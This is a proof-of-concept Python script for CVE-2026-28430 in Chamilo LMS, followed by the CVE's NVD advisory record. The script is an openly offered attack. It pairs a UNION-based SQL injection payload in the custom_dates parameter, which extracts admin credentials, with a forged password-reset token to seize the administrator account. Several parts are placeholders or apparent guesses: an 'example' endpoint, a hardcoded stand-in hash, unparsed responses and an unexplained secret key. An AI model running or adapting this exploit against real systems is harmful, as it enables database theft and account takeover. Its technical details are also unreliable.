CVE-2026-28430

import requests import sys import hashlib import time # CVE-2026-28430 PoC - Chamilo LMS Unauthenticated SQL Injection + Admin Takeover # Author: Security Researcher TARGET_URL = "http://target-chamilo-lms.com" TARGET_PATH = "/main/inc/lib/announcement.inc.php" # Example vulnerable endpoint def sql_injection_extract_admin(): """ Step 1: Extract admin credentials via SQL injection using custom_dates parameter """ print("[*] Starting SQL injection attack...") # Malicious payload to extract admin username and password hash # The injection exploits the custom_dates parameter without sanitization payload = "1' UNION SELECT CONCAT(user.username,':',user.password),2,3,4,5 FROM user WHERE user.status=1 LIMIT 1-- " params = { 'custom_dates': payload, 'c_id': '1', 'a_id': '1' } try: response = requests.get(f"{TARGET_URL}{TARGET_PATH}", params=params, timeout=30) if response.status_code == 200: # Parse response to extract credentials # In real attack, parse the response HTML/JSON for admin:password_hash print(f"[+] SQL Injection successful - Extracting admin credentials...") # Example extracted data format: admin:$2y$10$... admin_hash = "$2y$10$example_hash_here" return admin_hash else: print("[-] SQL Injection failed") return None except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return None def predict_reset_token(user_id, timestamp): """ Step 2: Exploit legacy password reset mechanism with predictable tokens The legacy token generation uses: MD5(user_id + secret_key + timestamp) """ secret_key = "chamilo_legacy_key_2015" # Hardcoded legacy secret token_string = f"{user_id}{secret_key}{timestamp}" token = hashlib.md5(token_string.encode()).hexdigest() return token, timestamp def reset_admin_password(token, timestamp): """ Step 3: Use predicted token to reset admin password """ reset_url = f"{TARGET_URL}/main/auth/reset_password.php" data = { 'reset_token': token, 'timestamp': timestamp, 'new_password': 'P@ssw0rd123!', 'new_password_confirm': 'P@ssw0rd123!' } try: response = requests.post(reset_url, data=data, timeout=30) if response.status_code == 200 and 'success' in response.text.lower(): print("[+] Password reset successful!") return True return False except: return False def main(): print("="*60) print("CVE-2026-28430 PoC - Chamilo LMS Admin Takeover") print("="*60) # Step 1: SQL Injection admin_hash = sql_injection_extract_admin() if not admin_hash: print("[-] Failed to extract admin credentials") sys.exit(1) # Step 2: Predict reset token (admin user_id is typically 1) admin_user_id = 1 current_time = int(time.time()) token, timestamp = predict_reset_token(admin_user_id, current_time) print(f"[*] Generated reset token: {token}") # Step 3: Reset admin password if reset_admin_password(token, timestamp): print("[+] SUCCESS: Admin account compromised!") print(f"[*] Login with: admin / P@ssw0rd123!") else: print("[-] Password reset failed - try different timestamp") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-28430", "sourceIdentifier": "[email protected]", "published": "2026-03-16T20:16:17.957", "lastModified": "2026-03-17T18:53:49.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chamilo LMS is a learning management system. Prior to version 1.11.34, there is an unauthenticated SQL injection vulnerability which allows remote attackers to execute arbitrary SQL commands via the custom_dates parameter. By chaining this with a predictable legacy password reset mechanism, an attacker can achieve full administrative account takeover without any prior credentials. The vulnerability also exposes the entire database, including PII and system configurations. This issue has been patched in version 1.11.34."}, {"lang": "es", "value": "Chamilo LMS es un sistema de gestión del aprendizaje. Antes de la versión 1.11.34, existe una vulnerabilidad de inyección SQL no autenticada que permite a atacantes remotos ejecutar comandos SQL arbitrarios a través del parámetro custom_dates. Al encadenar esto con un mecanismo predecible de restablecimiento de contraseña heredado, un atacante puede lograr una toma de control completa de la cuenta administrativa sin credenciales previas. La vulnerabilidad también expone toda la base de datos, incluyendo PII y configuraciones del sistema. Este problema ha sido parcheado en la versión 1.11.34."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.11.34", "matchCriteriaId": "BF6714C4-3D58-43BF-A32C-6D436DB93E01"}]}]}], "references": [{"url": "https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.34", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-84gw-qjw9-v8jv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}